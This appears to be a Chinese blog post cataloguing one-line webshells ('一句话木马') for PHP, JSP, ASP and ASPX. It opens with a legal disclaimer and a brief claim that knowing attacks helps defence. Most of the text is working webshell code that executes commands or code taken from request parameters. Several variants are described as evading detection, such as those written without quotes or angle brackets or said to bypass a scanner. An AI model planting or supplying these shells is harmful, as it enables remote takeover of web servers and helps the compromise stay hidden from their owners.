网络安全-一句话木马

声明

遵纪守法

请严格遵守网络安全法相关条例!

此分享主要用于交流学习,请勿用于非法用途,一切后果自付。

一切未经授权的网络攻击均为违法行为,互联网非法外之地。

反制

大家在知道了常规一句话的木马之后,就可以通过关键字或者更高级的方式来查看服务器是否存在木马。不知攻、焉知防。

最经典的 php一句话

java 复制代码
<?php eval(@$_POST['cmd']); ?>

php7中此命令是不行的,可以拼接命令绕过。这也显示了攻防的对抗和进化。

java 复制代码
<?php 
	$p = $_POST['cmd'];
	@eval($p);
?>

jsp一句话:

java 复制代码
  <%
    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
//    System.out.println(process);
    InputStream inputStream = process.getInputStream();
    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
    String line;
    while ((line = bufferedReader.readLine()) != null){
      response.getWriter().println(line);
    }
  %>

images

java 复制代码
<!--#include file="images\1.jpg" -->

<%eval request("3")%>

<%execute request("3")%>

<%execute(request("3"))%>

<%If Request("3")<>"" Then Execute(Request("3"))%>

<%if request ("3")<>""then session("3")=request("3"):end if:if session("3")<>"" then execute session

("3")%>

<SCRIPT language=VBScript runat="server">execute request("3")</SCRIPT>

<%@ Page Language="Jscript"%>

<%eval(Request.Item["3"],"unsafe");%>

asp一句话

java 复制代码
<%execute(request("3"))%>

aspx一句话

java 复制代码
<script language="C#" runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>

可以躲过雷客图的一句话。

java 复制代码
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>

不用'<,>'的asp一句话

java 复制代码
<script language=VBScript runat=server>execute request("1")</script>

不用双引号的一句话。

java 复制代码
<%eval request(chr(35))%>

参考:

lcx.cc

相关推荐
呜呼~2251427 分钟前
前后端数据交互
java·vue.js·spring boot·前端框架·intellij-idea·交互·css3
飞的肖35 分钟前
从测试服务器手动热部署到生产环境的实现
java·服务器·系统架构
m0_7482507439 分钟前
2020数字中国创新大赛-虎符网络安全赛道丨Web Writeup
前端·安全·web安全
周伯通*40 分钟前
策略模式以及优化
java·前端·策略模式
两点王爷1 小时前
Java读取csv文件内容,保存到sqlite数据库中
java·数据库·sqlite·csv
Hacker_Oldv1 小时前
通过端口测试验证网络安全策略
安全·web安全
飘飘燃雪1 小时前
Linux Modbus协议详解,代码示例
linux·运维·服务器·modbus
蜗牛hb1 小时前
Kali基础知识
linux·运维·服务器
几维安全1 小时前
出海隐私合规解决方案,一文助力中企合规出海
网络·安全
问道飞鱼1 小时前
【Springboot知识】Springboot进阶-实现CAS完整流程
java·spring boot·后端·cas